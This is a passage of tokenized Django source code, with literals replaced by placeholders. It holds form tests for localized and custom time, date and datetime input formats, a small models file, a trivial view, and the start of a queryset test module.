<EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class SimpleTimeFormatTests ( TestCase ) : <EOL> def test_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_timeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . TimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , time ( <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:0> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class LocalizedDateTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATE_INPUT_FORMATS = settings . DATE_INPUT_FORMATS <EOL> self . old_USE_L10N = settings . USE_L10N <EOL> settings . DATE_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> settings . USE_L10N = True <EOL> activate ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> settings . DATE_INPUT_FORMATS = self . old_DATE_INPUT_FORMATS <EOL> settings . USE_L10N = self . old_USE_L10N <EOL> deactivate ( ) <EOL> def test_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class CustomDateInputFormatsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATE_INPUT_FORMATS = settings . DATE_INPUT_FORMATS <EOL> settings . DATE_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def tearDown ( self ) : <EOL> settings . DATE_INPUT_FORMATS = self . old_DATE_INPUT_FORMATS <EOL> def test_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class SimpleDateFormatTests ( TestCase ) : <EOL> def test_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , date ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class LocalizedDateTimeTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATETIME_INPUT_FORMATS = settings . DATETIME_INPUT_FORMATS <EOL> self . old_USE_L10N = settings . USE_L10N <EOL> settings . DATETIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> settings . USE_L10N = True <EOL> activate ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> settings . DATETIME_INPUT_FORMATS = self . old_DATETIME_INPUT_FORMATS <EOL> settings . USE_L10N = self . old_USE_L10N <EOL> deactivate ( ) <EOL> def test_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class CustomDateTimeInputFormatsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . old_DATETIME_INPUT_FORMATS = settings . DATETIME_INPUT_FORMATS <EOL> settings . DATETIME_INPUT_FORMATS = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> def tearDown ( self ) : <EOL> settings . DATETIME_INPUT_FORMATS = self . old_DATETIME_INPUT_FORMATS <EOL> def test_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> class SimpleDateTimeFormatTests ( TestCase ) : <EOL> def test_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> def test_localized_dateTimeField_with_inputformat ( self ) : <EOL> "<STR_LIT>" <EOL> f = forms . DateTimeField ( input_formats = [ "<STR_LIT>" , "<STR_LIT>" ] , localize = True ) <EOL> self . assertRaises ( forms . ValidationError , f . clean , '<STR_LIT>' ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT:5> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) <EOL> result = f . clean ( '<STR_LIT>' ) <EOL> self . assertEqual ( result , datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) <EOL> text = f . widget . _format_value ( result ) <EOL> self . assertEqual ( text , "<STR_LIT>" ) </s>
<s> from django . db import models <EOL> class People ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> class Message ( models . Model ) : <EOL> from_field = models . ForeignKey ( People , db_column = '<STR_LIT>' ) </s>
<s> from django import http <EOL> def index ( request ) : <EOL> return http . HttpResponse ( '<STR_LIT>' ) </s>
<s> import datetime <EOL> import pickle <EOL> import sys <EOL> import unittest <EOL> from django . conf import settings <EOL> from django . core . exceptions import FieldError <EOL> from django . db import DatabaseError , connection , connections , DEFAULT_DB_ALIAS <EOL> from django . db . models import Count <EOL> from django . db . models . query import Q , ITER_CHUNK_SIZE , EmptyQuerySet <EOL> from django . test import TestCase <EOL> from django . utils . datastructures import SortedDict <EOL> from models import ( Annotation , Article , Author , Celebrity , Child , Cover , Detail , <EOL> DumbCategory , ExtraInfo , Fan , Item , LeafA , LoopX , LoopZ , ManagedModel , <EOL> Member , NamedCategory , Note , Number , Plaything , PointerA , Ranking , Related , <EOL> Report , ReservedName , Tag , TvChef , Valid , X , Food , Eaten , Node ) <EOL> class BaseQuerysetTest ( TestCase ) : <EOL> def assertValueQuerysetEqual ( self , qs , values ) : <EOL> return self . assertQuerysetEqual ( qs , values , transform = lambda x : x ) <EOL> def assertRaisesMessage ( self , exc , msg , func , * args , ** kwargs ) : <EOL> try : <EOL> func ( * args , ** kwargs ) <EOL> except Exception , e : <EOL> self . assertEqual ( msg , str ( e ) ) <EOL> self . assertTrue ( isinstance ( e , exc ) , "<STR_LIT>" % ( exc , type ( e ) ) ) <EOL> else : <EOL> if hasattr ( exc , '<STR_LIT>' ) : <EOL> excName = exc . __name__ <EOL> else : <EOL> excName = str ( exc ) <EOL> raise AssertionError , "<STR_LIT>" % excName <EOL> class Queries1Tests ( BaseQuerysetTest ) : <EOL> def setUp ( self ) : <EOL> generic = NamedCategory . objects . create ( name = "<STR_LIT>" ) <EOL> self . t1 = Tag . objects . create ( name = '<STR_LIT>' , category = generic ) <EOL> self . t2 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t1 , category = generic ) <EOL> self . t3 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t1 ) <EOL> t4 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t3 ) <EOL> self . t5 = Tag . objects . create ( name = '<STR_LIT>' , parent = self . t3 ) <EOL> self . n1 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:1> ) <EOL> n2 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:bar>' , id = <NUM_LIT:2> ) <EOL> self . n3 = Note . objects . create ( note = '<STR_LIT>' , misc = '<STR_LIT:foo>' , id = <NUM_LIT:3> ) <EOL> ann1 = Annotation . objects . create ( name = '<STR_LIT>' , tag = self . t1 ) <EOL> ann1 . notes . add ( self . n1 ) <EOL> ann2 = Annotation . objects . create ( name = '<STR_LIT>' , tag = t4 ) <EOL> ann2 . notes . add ( n2 , self . n3 ) <EOL> self . e2 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = n2 ) <EOL> e1 = ExtraInfo . objects . create ( info = '<STR_LIT>' , note = self . n1 ) <EOL> self . a1 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> self . a2 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = e1 ) <EOL> a3 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = self . e2 ) <EOL> self . a4 = Author . objects . create ( name = '<STR_LIT>' , num = <NUM_LIT> , extra = self . e2 ) <EOL> self . time1 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> self . time2 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> time3 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> time4 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . i1 = Item . objects . create ( name = 